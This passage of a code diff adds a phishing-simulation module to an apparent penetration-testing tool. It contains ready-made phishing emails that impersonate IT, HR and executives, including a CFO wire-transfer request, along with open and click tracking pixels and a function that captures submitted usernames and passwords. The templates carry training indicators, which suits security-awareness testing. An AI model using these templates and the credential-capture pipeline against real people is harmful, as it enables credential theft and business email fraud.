+      lines.push(`Type: ${payload.type}`)
+      lines.push(`Name: ${payload.name}`)
+      lines.push(`Tracking: ${payload.trackingEnabled ? "✓" : "✗"}`)
+      if (payload.filename) {
+        lines.push(`Filename: ${payload.filename}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/phishing/templates.ts b/packages/opencode/src/pentest/soceng/phishing/templates.ts
new file mode 100644
index 00000000000..4ce5864cf3d
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/templates.ts
@@ -0,0 +1,720 @@
+/**
+ * @fileoverview Phishing Template Library
+ *
+ * Pre-built phishing templates for various scenarios.
+ *
+ * @module pentest/soceng/phishing/templates
+ */
+
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { EmailGenerator } from "../email/generator"
+
+/**
+ * Phishing templates namespace.
+ */
+export namespace PhishingTemplates {
+  // ========== Template Categories ==========
+
+  /**
+   * Template category with metadata.
+   */
+  export interface TemplateCategory {
+    id: string
+    name: string
+    description: string
+    difficulty: "easy" | "medium" | "hard"
+    effectiveness: "low" | "medium" | "high"
+    templates: TemplateDefinition[]
+  }
+
+  /**
+   * Template definition.
+   */
+  export interface TemplateDefinition {
+    id: string
+    name: string
+    subject: string
+    bodyHtml: string
+    bodyText: string
+    senderName: string
+    senderEmail: string
+    pretext: string
+    indicators: string[]
+    trainingPoints: string[]
+  }
+
+  // ========== Built-in Templates ==========
+
+  /**
+   * Password reset templates.
+   */
+  export const PASSWORD_RESET_TEMPLATES: TemplateCategory = {
+    id: "password-reset",
+    name: "Password Reset",
+    description: "Templates mimicking password reset notifications",
+    difficulty: "easy",
+    effectiveness: "high",
+    templates: [
+      {
+        id: "pwd-reset-urgent",
+        name: "Urgent Password Reset",
+        subject: "Urgent: Your Password Will Expire Today",
+        bodyHtml: `
+          <div style="max-width: 600px; margin: 0 auto; font-family: Arial, sans-serif;">
+            <div style="background: #d32f2f; color: white; padding: 20px; text-align: center;">
+              <h2 style="margin: 0;">⚠️ Password Expiration Notice</h2>
+            </div>
+            <div style="padding: 30px; background: #f5f5f5;">
+              <p>Dear {{firstName}},</p>
+              <p>Your password for <strong>{{email}}</strong> will expire <strong>today</strong>.</p>
+              <p>To avoid losing access to your account, please reset your password immediately:</p>
+              <p style="text-align: center; margin: 30px 0;">
+                <a href="{{landingUrl}}" style="background: #1976d2; color: white; padding: 15px 30px; text-decoration: none; border-radius: 5px; font-weight: bold;">
+                  Reset Password Now
+                </a>
+              </p>
+              <p style="color: #666; font-size: 12px;">
+                If you did not request this, please contact IT support immediately.
+              </p>
+            </div>
+            <div style="padding: 15px; text-align: center; color: #999; font-size: 11px;">
+              This is an automated message from IT Security.
+            </div>
+          </div>
+        `,
+        bodyText: `Dear {{firstName}},
+
+Your password for {{email}} will expire today.
+
+To avoid losing access to your account, please reset your password immediately:
+{{landingUrl}}
+
+If you did not request this, please contact IT support immediately.
+
+IT Security Team`,
+        senderName: "IT Security",
+        senderEmail: "security-noreply",
+        pretext: "IT department sending urgent password expiration notice",
+        indicators: [
+          "Urgent language creating time pressure",
+          "Generic sender address",
+          "External link for password reset",
+          "Vague 'IT Security' sender",
+        ],
+        trainingPoints: [
+          "Legitimate password reset emails are rarely urgent",
+          "Always verify sender email domain",
+          "Navigate to sites directly, don't click email links",
+          "Contact IT directly to verify requests",
+        ],
+      },
+      {
+        id: "pwd-reset-suspicious",
+        name: "Suspicious Activity Alert",
+        subject: "Security Alert: Unusual Login Detected",
+        bodyHtml: `
+          <div style="max-width: 600px; margin: 0 auto; font-family: Arial, sans-serif;">
+            <div style="background: #ff9800; padding: 20px;">
+              <h2 style="margin: 0; color: #333;">🔒 Security Alert</h2>
+            </div>
+            <div style="padding: 30px; border: 1px solid #ddd;">
+              <p>Hi {{firstName}},</p>
+              <p>We detected an unusual sign-in attempt on your account:</p>
+              <table style="width: 100%; margin: 20px 0; border-collapse: collapse;">
+                <tr><td style="padding: 8px; border-bottom: 1px solid #eee;"><strong>Time:</strong></td><td style="padding: 8px; border-bottom: 1px solid #eee;">{{date}} {{time}}</td></tr>
+                <tr><td style="padding: 8px; border-bottom: 1px solid #eee;"><strong>Location:</strong></td><td style="padding: 8px; border-bottom: 1px solid #eee;">Unknown (VPN detected)</td></tr>
+                <tr><td style="padding: 8px; border-bottom: 1px solid #eee;"><strong>Device:</strong></td><td style="padding: 8px; border-bottom: 1px solid #eee;">Unknown Browser</td></tr>
+              </table>
+              <p><strong>Was this you?</strong></p>
+              <p>
+                <a href="{{landingUrl}}?action=verify" style="background: #4caf50; color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px; margin-right: 10px;">Yes, it was me</a>
+                <a href="{{landingUrl}}?action=secure" style="background: #f44336; color: white; padding: 10px 20px; text-decoration: none; border-radius: 4px;">No, secure my account</a>
+              </p>
+            </div>
+          </div>
+        `,
+        bodyText: `Hi {{firstName}},
+
+We detected an unusual sign-in attempt on your account:
+
+Time: {{date}} {{time}}
+Location: Unknown (VPN detected)
+Device: Unknown Browser
+
+Was this you?
+Yes, it was me: {{landingUrl}}?action=verify
+No, secure my account: {{landingUrl}}?action=secure`,
+        senderName: "Account Security",
+        senderEmail: "no-reply",
+        pretext: "Security alert about suspicious login activity",
+        indicators: [
+          "Urgency around account security",
+          "Vague location details",
+          "Both buttons lead to same destination",
+          "Generic sender information",
+        ],
+        trainingPoints: [
+          "Real security alerts include specific details",
+          "Hover over links before clicking",
+          "Log in directly to check account activity",
+          "Report suspicious emails to IT",
+        ],
+      },
+    ],
+  }
+
+  /**
+   * IT support templates.
+   */
+  export const IT_SUPPORT_TEMPLATES: TemplateCategory = {
+    id: "it-support",
+    name: "IT Support",
+    description: "Templates impersonating IT support communications",
+    difficulty: "medium",
+    effectiveness: "high",
+    templates: [
+      {
+        id: "it-maintenance",
+        name: "System Maintenance",
+        subject: "Action Required: System Maintenance - Verify Your Account",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif; max-width: 600px; margin: 0 auto;">
+            <div style="background: #2196f3; color: white; padding: 15px;">
+              <h3 style="margin: 0;">{{company}} IT Department</h3>
+            </div>
+            <div style="padding: 25px; background: #fff; border: 1px solid #ddd;">
+              <p>Dear {{firstName}},</p>
+              <p>As part of our scheduled system maintenance, we are upgrading our email servers to improve security and performance.</p>
+              <p><strong>Action Required:</strong> To ensure uninterrupted email access, please verify your account credentials before <strong>{{date}}</strong>.</p>
+              <p style="text-align: center; margin: 25px 0;">
+                <a href="{{landingUrl}}" style="background: #2196f3; color: white; padding: 12px 25px; text-decoration: none; border-radius: 4px;">
+                  Verify Account
+                </a>
+              </p>
+              <p style="font-size: 12px; color: #666;">
+                This verification is mandatory for all employees. Failure to verify may result in temporary account suspension.
+              </p>
+              <hr style="border: none; border-top: 1px solid #eee; margin: 20px 0;">
+              <p style="margin: 0;">Best regards,<br><strong>IT Support Team</strong><br>{{company}}</p>
+            </div>
+          </div>
+        `,
+        bodyText: `Dear {{firstName}},
+
+As part of our scheduled system maintenance, we are upgrading our email servers to improve security and performance.
+
+Action Required: To ensure uninterrupted email access, please verify your account credentials before {{date}}.
+
+Verify Account: {{landingUrl}}
+
+This verification is mandatory for all employees. Failure to verify may result in temporary account suspension.
+
+Best regards,
+IT Support Team
+{{company}}`,
+        senderName: "IT Support",
+        senderEmail: "it-support",
+        pretext: "IT department requesting account verification for maintenance",
+        indicators: [
+          "Threat of account suspension",
+          "Request to verify credentials via link",
+          "Urgency with specific deadline",
+          "Generic IT Support signature",
+        ],
+        trainingPoints: [
+          "IT never asks for password verification via email",
+          "Legitimate maintenance doesn't require credential entry",
+          "Contact IT directly to verify such requests",
+          "Check with colleagues if they received similar emails",
+        ],
+      },
+      {
+        id: "it-software-update",
+        name: "Software Update Required",
+        subject: "Required: Critical Security Update for Your Workstation",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif; max-width: 600px; margin: 0 auto;">
+            <div style="background: #424242; color: white; padding: 15px;">
+              <h3 style="margin: 0;">🖥️ IT Infrastructure Update</h3>
+            </div>
+            <div style="padding: 25px; background: #fff;">
+              <p>Hello {{firstName}},</p>
+              <p>A critical security vulnerability has been identified that affects your workstation. Our security team requires all employees to install the latest security patch immediately.</p>
+              <div style="background: #fff3cd; border: 1px solid #ffc107; padding: 15px; margin: 20px 0; border-radius: 4px;">
+                <strong>⚠️ Important:</strong> This update must be completed by end of business today to maintain network access.
+              </div>
+              <p>Please download and install the update:</p>
+              <p style="text-align: center;">
+                <a href="{{landingUrl}}" style="background: #4caf50; color: white; padding: 12px 30px; text-decoration: none; border-radius: 4px; display: inline-block;">
+                  Download Security Update
+                </a>
+              </p>
+              <p style="font-size: 11px; color: #999; margin-top: 30px;">
+                Ticket #: INC{{date}}{{time}}<br>
+                Priority: Critical
+              </p>
+            </div>
+          </div>
+        `,
+        bodyText: `Hello {{firstName}},
+
+A critical security vulnerability has been identified that affects your workstation. Our security team requires all employees to install the latest security patch immediately.
+
+Important: This update must be completed by end of business today to maintain network access.
+
+Please download and install the update:
+{{landingUrl}}
+
+Ticket #: INC{{date}}{{time}}
+Priority: Critical
+
+IT Infrastructure Team`,
+        senderName: "IT Infrastructure",
+        senderEmail: "it-infrastructure",
+        pretext: "IT pushing critical security update to employees",
+        indicators: [
+          "Request to download and run software",
+          "Urgent deadline with consequences",
+          "External download link",
+          "Fake ticket number for legitimacy",
+        ],
+        trainingPoints: [
+          "Never download software from email links",
+          "Legitimate updates come through official channels (SCCM, etc.)",
+          "IT security patches are pushed automatically",
+          "Verify with IT before installing anything",
+        ],
+      },
+    ],
+  }
+
+  /**
+   * HR templates.
+   */
+  export const HR_TEMPLATES: TemplateCategory = {
+    id: "hr",
+    name: "Human Resources",
+    description: "Templates impersonating HR communications",
+    difficulty: "medium",
+    effectiveness: "high",
+    templates: [
+      {
+        id: "hr-benefits",
+        name: "Benefits Update",
+        subject: "Action Required: Annual Benefits Enrollment Ending Soon",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif; max-width: 600px; margin: 0 auto;">
+            <div style="background: #673ab7; color: white; padding: 20px;">
+              <h2 style="margin: 0;">📋 Benefits Enrollment Reminder</h2>
+            </div>
+            <div style="padding: 30px; background: #fff; border: 1px solid #e0e0e0;">
+              <p>Dear {{firstName}},</p>
+              <p>This is a reminder that the annual benefits enrollment period ends on <strong>{{date}}</strong>.</p>
+              <p>Our records indicate you have not yet completed your benefits selections for the upcoming year. Please review and confirm your choices to ensure continued coverage.</p>
+              <div style="background: #f5f5f5; padding: 20px; margin: 20px 0; border-radius: 4px;">
+                <strong>Available Benefits:</strong>
+                <ul style="margin: 10px 0;">
+                  <li>Health Insurance</li>
+                  <li>Dental & Vision</li>
+                  <li>401(k) Contributions</li>
+                  <li>Life Insurance</li>
+                  <li>FSA/HSA Elections</li>
+                </ul>
+              </div>
+              <p style="text-align: center;">
+                <a href="{{landingUrl}}" style="background: #673ab7; color: white; padding: 15px 30px; text-decoration: none; border-radius: 4px; display: inline-block;">
+                  Complete Enrollment
+                </a>
+              </p>
+              <p style="font-size: 12px; color: #666; margin-top: 30px;">
+                Questions? Contact HR at hr@{{company}}.com
+              </p>
+            </div>
+          </div>
+        `,
+        bodyText: `Dear {{firstName}},
+
+This is a reminder that the annual benefits enrollment period ends on {{date}}.
+
+Our records indicate you have not yet completed your benefits selections for the upcoming year. Please review and confirm your choices to ensure continued coverage.
+
+Available Benefits:
+- Health Insurance
+- Dental & Vision
+- 401(k) Contributions
+- Life Insurance
+- FSA/HSA Elections
+
+Complete Enrollment: {{landingUrl}}
+
+Questions? Contact HR at hr@{{company}}.com
+
+Human Resources`,
+        senderName: "Human Resources",
+        senderEmail: "hr-benefits",
+        pretext: "HR reminding about benefits enrollment deadline",
+        indicators: [
+          "Urgency around enrollment deadline",
+          "Claims you haven't enrolled yet",
+          "External link to enrollment portal",
+          "Convincing but impersonated HR sender",
+        ],
+        trainingPoints: [
+          "Benefits enrollment should be done through official HR portal",
+          "Verify enrollment status directly with HR",
+          "Check company intranet for official announcements",
+          "HR typically communicates through official channels",
+        ],
+      },
+      {
+        id: "hr-policy-update",
+        name: "Policy Acknowledgment",
+        subject: "Required: Updated Employee Handbook Acknowledgment",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif; max-width: 600px; margin: 0 auto;">
+            <div style="background: #009688; color: white; padding: 15px;">
+              <h3 style="margin: 0;">{{company}} Human Resources</h3>
+            </div>
+            <div style="padding: 25px; background: #fff;">
+              <p>Dear {{firstName}},</p>
+              <p>The employee handbook has been updated with important policy changes effective immediately. All employees are required to review and acknowledge the updated policies.</p>
+              <p><strong>Key Updates Include:</strong></p>
+              <ul>
+                <li>Remote Work Policy</li>
+                <li>Data Security Guidelines</li>
+                <li>Acceptable Use Policy</li>
+                <li>Anti-Harassment Policy</li>
+              </ul>
+              <p>Please review and sign the acknowledgment form by clicking below:</p>
+              <p style="text-align: center; margin: 25px 0;">
+                <a href="{{landingUrl}}" style="background: #009688; color: white; padding: 12px 25px; text-decoration: none; border-radius: 4px;">
+                  Review & Acknowledge
+                </a>
+              </p>
+              <p style="font-size: 12px; color: #666;">
+                Failure to acknowledge may affect your employment status.
+              </p>
+            </div>
+          </div>
+        `,
+        bodyText: `Dear {{firstName}},
+
+The employee handbook has been updated with important policy changes effective immediately. All employees are required to review and acknowledge the updated policies.
+
+Key Updates Include:
+- Remote Work Policy
+- Data Security Guidelines
+- Acceptable Use Policy
+- Anti-Harassment Policy
+
+Please review and sign the acknowledgment form:
+{{landingUrl}}
+
+Failure to acknowledge may affect your employment status.
+
+Human Resources
+{{company}}`,
+        senderName: "Human Resources",
+        senderEmail: "hr-noreply",
+        pretext: "HR requiring policy acknowledgment",
+        indicators: [
+          "Threat about employment status",
+          "External link for acknowledgment",
+          "Vague about specific changes",
+          "No mention of internal HR systems",
+        ],
+        trainingPoints: [
+          "Policy acknowledgments go through internal HR systems",
+          "Check with HR before clicking external links",
+          "Legitimate HR emails reference internal portals",
+          "Employment threats are unusual in routine communications",
+        ],
+      },
+    ],
+  }
+
+  /**
+   * Executive impersonation templates.
+   */
+  export const EXECUTIVE_TEMPLATES: TemplateCategory = {
+    id: "executive",
+    name: "Executive Impersonation",
+    description: "CEO/CFO fraud and business email compromise templates",
+    difficulty: "hard",
+    effectiveness: "high",
+    templates: [
+      {
+        id: "exec-urgent-request",
+        name: "CEO Urgent Request",
+        subject: "Quick favor - urgent",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif;">
+            <p>{{firstName}},</p>
+            <p>Are you at your desk? I need your help with something confidential and time-sensitive.</p>
+            <p>I'm in back-to-back meetings and can't make calls right now. Please reply to this email ASAP.</p>
+            <p>Thanks,<br>
+            John<br>
+            <em style="color: #666; font-size: 12px;">Sent from my iPhone</em></p>
+          </div>
+        `,
+        bodyText: `{{firstName}},
+
+Are you at your desk? I need your help with something confidential and time-sensitive.
+
+I'm in back-to-back meetings and can't make calls right now. Please reply to this email ASAP.
+
+Thanks,
+John
+
+Sent from my iPhone`,
+        senderName: "John Smith",
+        senderEmail: "john.smith",
+        pretext: "CEO reaching out for urgent, confidential help",
+        indicators: [
+          "Informal tone from executive",
+          "Urgency without specific details",
+          "Cannot be reached by phone",
+          "Mobile signature for legitimacy",
+        ],
+        trainingPoints: [
+          "Always verify unusual requests from executives",
+          "Executives don't ask for urgent favors via email",
+          "Check the actual sender email address",
+          "Call the executive directly to verify",
+        ],
+      },
+      {
+        id: "exec-wire-transfer",
+        name: "Wire Transfer Request",
+        subject: "Confidential - Wire Transfer Needed",
+        bodyHtml: `
+          <div style="font-family: Arial, sans-serif;">
+            <p>Hi {{firstName}},</p>
+            <p>I need you to process an urgent wire transfer for an acquisition we're closing today. This is highly confidential - please don't discuss with anyone else.</p>
+            <p>I'll send you the details shortly. Can you confirm you're available to handle this?</p>
+            <p>This needs to be completed before 5pm today.</p>
+            <p>Regards,<br>
+            Michael Thompson<br>
+            <span style="font-size: 12px; color: #666;">Chief Financial Officer</span></p>
+          </div>
+        `,
+        bodyText: `Hi {{firstName}},
+
+I need you to process an urgent wire transfer for an acquisition we're closing today. This is highly confidential - please don't discuss with anyone else.
+
+I'll send you the details shortly. Can you confirm you're available to handle this?
+
+This needs to be completed before 5pm today.
+
+Regards,
+Michael Thompson
+Chief Financial Officer`,
+        senderName: "Michael Thompson",
+        senderEmail: "m.thompson",
+        pretext: "CFO requesting urgent confidential wire transfer",
+        indicators: [
+          "Request for confidential financial transaction",
+          "Urgency with same-day deadline",
+          "Request to not discuss with others",
+          "Initial email to establish rapport",
+        ],
+        trainingPoints: [
+          "Financial requests require verbal confirmation",
+          "Never bypass normal approval processes",
+          "Secrecy requests are major red flags",
+          "Report BEC attempts to security immediately",
+        ],
+      },
+    ],
+  }
+
+  /**
+   * All template categories.
+   */
+  export const ALL_CATEGORIES: TemplateCategory[] = [
+    PASSWORD_RESET_TEMPLATES,
+    IT_SUPPORT_TEMPLATES,
+    HR_TEMPLATES,
+    EXECUTIVE_TEMPLATES,
+  ]
+
+  // ========== Template Operations ==========
+
+  /**
+   * Get all categories.
+   */
+  export function getCategories(): TemplateCategory[] {
+    return ALL_CATEGORIES
+  }
+
+  /**
+   * Get category by ID.
+   */
+  export function getCategory(categoryId: string): TemplateCategory | undefined {
+    return ALL_CATEGORIES.find((c) => c.id === categoryId)
+  }
+
+  /**
+   * Get template by ID.
+   */
+  export function getTemplate(templateId: string): TemplateDefinition | undefined {
+    for (const category of ALL_CATEGORIES) {
+      const template = category.templates.find((t) => t.id === templateId)
+      if (template) return template
+    }
+    return undefined
+  }
+
+  /**
+   * Convert template definition to email template.
+   */
+  export function toEmailTemplate(
+    definition: TemplateDefinition,
+    options?: {
+      senderDomain?: string
+      company?: string
+    }
+  ): SocEngTypes.EmailTemplate {
+    const domain = options?.senderDomain || "example.com"
+
+    let html = definition.bodyHtml
+    let text = definition.bodyText
+    let subject = definition.subject
+
+    if (options?.company) {
+      html = html.replace(/\{\{company\}\}/g, options.company)
+      text = text.replace(/\{\{company\}\}/g, options.company)
+      subject = subject.replace(/\{\{company\}\}/g, options.company)
+    }
+
+    return {
+      id: SocEngStorage.createTemplateId(),
+      name: definition.name,
+      category: definition.id.split("-")[0],
+      subject,
+      bodyHtml: wrapInHtmlDoc(html),
+      bodyText: text,
+      sender: {
+        name: definition.senderName,
+        email: `${definition.senderEmail}@${domain}`,
+      },
+      variables: EmailGenerator.STANDARD_VARIABLES.filter(
+        (v) => html.includes(v) || text.includes(v) || subject.includes(v)
+      ),
+      createdAt: Date.now(),
+    }
+  }
+
+  /**
+   * Wrap HTML content in full document.
+   */
+  function wrapInHtmlDoc(content: string): string {
+    return `<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <meta name="viewport" content="width=device-width, initial-scale=1.0">
+</head>
+<body style="margin: 0; padding: 20px; background: #f5f5f5;">
+  ${content}
+  <img src="{{trackingUrl}}" width="1" height="1" style="display:none" alt="">
+</body>
+</html>`
+  }
+
+  /**
+   * Search templates by keyword.
+   */
+  export function searchTemplates(keyword: string): TemplateDefinition[] {
+    const lower = keyword.toLowerCase()
+    const results: TemplateDefinition[] = []
+
+    for (const category of ALL_CATEGORIES) {
+      for (const template of category.templates) {
+        if (
+          template.name.toLowerCase().includes(lower) ||
+          template.subject.toLowerCase().includes(lower) ||
+          template.pretext.toLowerCase().includes(lower)
+        ) {
+          results.push(template)
+        }
+      }
+    }
+
+    return results
+  }
+
+  /**
+   * Get templates by effectiveness.
+   */
+  export function getByEffectiveness(
+    level: "low" | "medium" | "high"
+  ): TemplateDefinition[] {
+    const results: TemplateDefinition[] = []
+
+    for (const category of ALL_CATEGORIES) {
+      if (category.effectiveness === level) {
+        results.push(...category.templates)
+      }
+    }
+
+    return results
+  }
+
+  // ========== Formatting ==========
+
+  /**
+   * Format template list for display.
+   */
+  export function formatTemplateList(): string {
+    const lines: string[] = []
+
+    lines.push("Phishing Template Library")
+    lines.push("=".repeat(50))
+
+    for (const category of ALL_CATEGORIES) {
+      lines.push("")
+      lines.push(`📁 ${category.name}`)
+      lines.push(`   ${category.description}`)
+      lines.push(`   Difficulty: ${category.difficulty} | Effectiveness: ${category.effectiveness}`)
+      lines.push("")
+
+      for (const template of category.templates) {
+        lines.push(`   • ${template.id}: ${template.name}`)
+        lines.push(`     Subject: "${template.subject}"`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format template details.
+   */
+  export function formatTemplateDetails(template: TemplateDefinition): string {
+    const lines: string[] = []
+
+    lines.push(`Template: ${template.name}`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`ID: ${template.id}`)
+    lines.push(`Subject: ${template.subject}`)
+    lines.push(`Sender: ${template.senderName} <${template.senderEmail}>`)
+    lines.push("")
+    lines.push("Pretext:")
+    lines.push(`  ${template.pretext}`)
+    lines.push("")
+    lines.push("Phishing Indicators:")
+    for (const indicator of template.indicators) {
+      lines.push(`  ⚠️ ${indicator}`)
+    }
+    lines.push("")
+    lines.push("Training Points:")
+    for (const point of template.trainingPoints) {
+      lines.push(`  ✓ ${point}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/soceng/phishing/tracking.ts b/packages/opencode/src/pentest/soceng/phishing/tracking.ts
new file mode 100644
index 00000000000..9c252fb61a2
--- /dev/null
+++ b/packages/opencode/src/pentest/soceng/phishing/tracking.ts
@@ -0,0 +1,567 @@
+/**
+ * @fileoverview Phishing Campaign Tracking
+ *
+ * Email open tracking, link click tracking, and engagement metrics.
+ *
+ * @module pentest/soceng/phishing/tracking
+ */
+
+import * as crypto from "crypto"
+import { SocEngTypes } from "../types"
+import { SocEngStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { SocEngEvents } from "../events"
+import { PhishingCampaigns } from "./campaigns"
+
+/**
+ * Phishing tracking namespace.
+ */
+export namespace PhishingTracking {
+  // ========== Tracking Token Generation ==========
+
+  /**
+   * Tracking token structure.
+   */
+  export interface TrackingToken {
+    campaignId: string
+    targetId: string
+    type: "open" | "click" | "submit"
+    timestamp: number
+    signature: string
+  }
+
+  /**
+   * Generate a tracking token.
+   */
+  export function generateToken(
+    campaignId: string,
+    targetId: string,
+    type: "open" | "click" | "submit",
+    secret: string
+  ): string {
+    const payload = {
+      c: campaignId,
+      t: targetId,
+      y: type,
+      ts: Date.now(),
+    }
+
+    const data = JSON.stringify(payload)
+    const signature = crypto
+      .createHmac("sha256", secret)
+      .update(data)
+      .digest("hex")
+      .substring(0, 16)
+
+    const token = Buffer.from(JSON.stringify({ ...payload, s: signature })).toString(
+      "base64url"
+    )
+
+    return token
+  }
+
+  /**
+   * Decode a tracking token.
+   */
+  export function decodeToken(token: string, secret: string): TrackingToken | null {
+    try {
+      const decoded = JSON.parse(Buffer.from(token, "base64url").toString("utf8"))
+
+      const { c, t, y, ts, s } = decoded
+      const payload = JSON.stringify({ c, t, y, ts })
+      const expectedSig = crypto
+        .createHmac("sha256", secret)
+        .update(payload)
+        .digest("hex")
+        .substring(0, 16)
+
+      if (s !== expectedSig) {
+        return null
+      }
+
+      return {
+        campaignId: c,
+        targetId: t,
+        type: y,
+        timestamp: ts,
+        signature: s,
+      }
+    } catch {
+      return null
+    }
+  }
+
+  // ========== URL Generation ==========
+
+  /**
+   * Tracking URL configuration.
+   */
+  export interface TrackingConfig {
+    baseUrl: string
+    trackingPath: string
+    landingPath: string
+    secret: string
+  }
+
+  /**
+   * Generate tracking pixel URL.
+   */
+  export function generatePixelUrl(
+    config: TrackingConfig,
+    campaignId: string,
+    targetId: string
+  ): string {
+    const token = generateToken(campaignId, targetId, "open", config.secret)
+    return `${config.baseUrl}${config.trackingPath}?t=${token}`
+  }
+
+  /**
+   * Generate tracked link URL.
+   */
+  export function generateTrackedLink(
+    config: TrackingConfig,
+    campaignId: string,
+    targetId: string,
+    destinationUrl?: string
+  ): string {
+    const token = generateToken(campaignId, targetId, "click", config.secret)
+    let url = `${config.baseUrl}${config.landingPath}?t=${token}`
+
+    if (destinationUrl) {
+      url += `&r=${encodeURIComponent(destinationUrl)}`
+    }
+
+    return url
+  }
+
+  /**
+   * Generate submission tracking URL.
+   */
+  export function generateSubmitUrl(
+    config: TrackingConfig,
+    campaignId: string,
+    targetId: string
+  ): string {
+    const token = generateToken(campaignId, targetId, "submit", config.secret)
+    return `${config.baseUrl}${config.landingPath}/submit?t=${token}`
+  }
+
+  // ========== Event Processing ==========
+
+  /**
+   * Process tracking event.
+   */
+  export async function processEvent(
+    token: string,
+    config: TrackingConfig,
+    metadata?: TrackingMetadata
+  ): Promise<TrackingResult> {
+    const decoded = decodeToken(token, config.secret)
+
+    if (!decoded) {
+      return {
+        success: false,
+        error: "Invalid or expired token",
+      }
+    }
+
+    const { campaignId, targetId, type } = decoded
+
+    // Get campaign and target
+    const campaign = await SocEngStorage.getCampaign(campaignId)
+    if (!campaign) {
+      return {
+        success: false,
+        error: "Campaign not found",
+      }
+    }
+
+    const target = campaign.targets.find((t) => t.id === targetId)
+    if (!target) {
+      return {
+        success: false,
+        error: "Target not found",
+      }
+    }
+
+    // Process based on event type
+    switch (type) {
+      case "open":
+        await processOpenEvent(campaign, target, metadata)
+        break
+      case "click":
+        await processClickEvent(campaign, target, metadata)
+        break
+      case "submit":
+        await processSubmitEvent(campaign, target, metadata)
+        break
+    }
+
+    return {
+      success: true,
+      campaignId,
+      targetId,
+      type,
+    }
+  }
+
+  /**
+   * Tracking metadata from request.
+   */
+  export interface TrackingMetadata {
+    userAgent?: string
+    ipAddress?: string
+    referer?: string
+    timestamp?: number
+  }
+
+  /**
+   * Tracking result.
+   */
+  export interface TrackingResult {
+    success: boolean
+    error?: string
+    campaignId?: string
+    targetId?: string
+    type?: "open" | "click" | "submit"
+  }
+
+  /**
+   * Process email open event.
+   */
+  async function processOpenEvent(
+    campaign: SocEngTypes.Campaign,
+    target: SocEngTypes.TargetWithStatus,
+    metadata?: TrackingMetadata
+  ): Promise<void> {
+    // Check if already opened
+    if (target.status === "pending" || target.status === "sent") {
+      target.status = "opened"
+      target.openedAt = Date.now()
+
+      await PhishingCampaigns.incrementResult(campaign.id, "opened")
+      await PhishingCampaigns.addTimelineEvent(
+        campaign.id,
+        "email_opened",
+        `Email opened by ${target.email}`,
+        target.id
+      )
+
+      Bus.publish(SocEngEvents.EmailOpened, {
+        campaignId: campaign.id,
+        targetId: target.id,
+        timestamp: Date.now(),
+        userAgent: metadata?.userAgent,
+        ipAddress: metadata?.ipAddress,
+      })
+    }
+  }
+
+  /**
+   * Process link click event.
+   */
+  async function processClickEvent(
+    campaign: SocEngTypes.Campaign,
+    target: SocEngTypes.TargetWithStatus,
+    metadata?: TrackingMetadata
+  ): Promise<void> {
+    // Ensure opened first
+    if (target.status === "pending" || target.status === "sent") {
+      target.status = "opened"
+      target.openedAt = Date.now()
+      await PhishingCampaigns.incrementResult(campaign.id, "opened")
+    }
+
+    if (target.status !== "clicked" && target.status !== "submitted") {
+      target.status = "clicked"
+      target.clickedAt = Date.now()
+
+      await PhishingCampaigns.incrementResult(campaign.id, "clicked")
+      await PhishingCampaigns.addTimelineEvent(
+        campaign.id,
+        "link_clicked",
+        `Link clicked by ${target.email}`,
+        target.id
+      )
+
+      Bus.publish(SocEngEvents.LinkClicked, {
+        campaignId: campaign.id,
+        targetId: target.id,
+        url: "", // URL is tracked elsewhere
+        timestamp: Date.now(),
+        userAgent: metadata?.userAgent,
+        ipAddress: metadata?.ipAddress,
+      })
+    }
+  }
+
+  /**
+   * Process form submission event.
+   */
+  async function processSubmitEvent(
+    campaign: SocEngTypes.Campaign,
+    target: SocEngTypes.TargetWithStatus,
+    metadata?: TrackingMetadata
+  ): Promise<void> {
+    // Ensure clicked first
+    if (target.status !== "clicked") {
+      await processClickEvent(campaign, target, metadata)
+    }
+
+    if (target.status !== "submitted") {
+      target.status = "submitted"
+      target.submittedAt = Date.now()
+
+      await PhishingCampaigns.incrementResult(campaign.id, "submitted")
+      await PhishingCampaigns.addTimelineEvent(
+        campaign.id,
+        "credential_submitted",
+        `Credentials submitted by ${target.email}`,
+        target.id
+      )
+
+      Bus.publish(SocEngEvents.CredentialCaptured, {
+        campaignId: campaign.id,
+        targetId: target.id,
+        fields: ["username", "password"], // Standard credential fields
+        timestamp: Date.now(),
+      })
+    }
+  }
+
+  // ========== Credential Capture ==========
+
+  /**
+   * Captured credentials structure (hashed).
+   */
+  export interface CapturedCredentials {
+    id: string
+    campaignId: string
+    targetId: string
+    usernameHash: string
+    passwordHash: string
+    formData: Record<string, string>
+    metadata: TrackingMetadata
+    timestamp: number
+  }
+
+  /**
+   * Capture submitted credentials.
+   */
+  export async function captureCredentials(
+    campaignId: string,
+    targetId: string,
+    formData: Record<string, string>,
+    metadata?: TrackingMetadata
+  ): Promise<void> {
+    // Identify credential fields
+    const usernameFields = ["username", "email", "user", "login", "account"]
+    const passwordFields = ["password", "pass", "pwd", "secret"]
+
+    let username = ""
+    let password = ""
+    const sanitizedData: Record<string, string> = {}
+
+    for (const [key, value] of Object.entries(formData)) {
+      const lowerKey = key.toLowerCase()
+
+      if (usernameFields.some((f) => lowerKey.includes(f))) {
+        username = value
+        sanitizedData[key] = "[CAPTURED]"
+      } else if (passwordFields.some((f) => lowerKey.includes(f))) {
+        password = value
+        sanitizedData[key] = "[CAPTURED]"
+      } else {
+        sanitizedData[key] = value
+      }
+    }
+
+    // Store as CapturedCredential (the hashing is done by storeCapturedCredential)
+    const credential: SocEngTypes.CapturedCredential = {
+      id: crypto.randomUUID(),
+      campaignId,
+      targetId,
+      fields: {
+        username: username,
+        password: password,
+        ...sanitizedData,
+      },
+      timestamp: Date.now(),
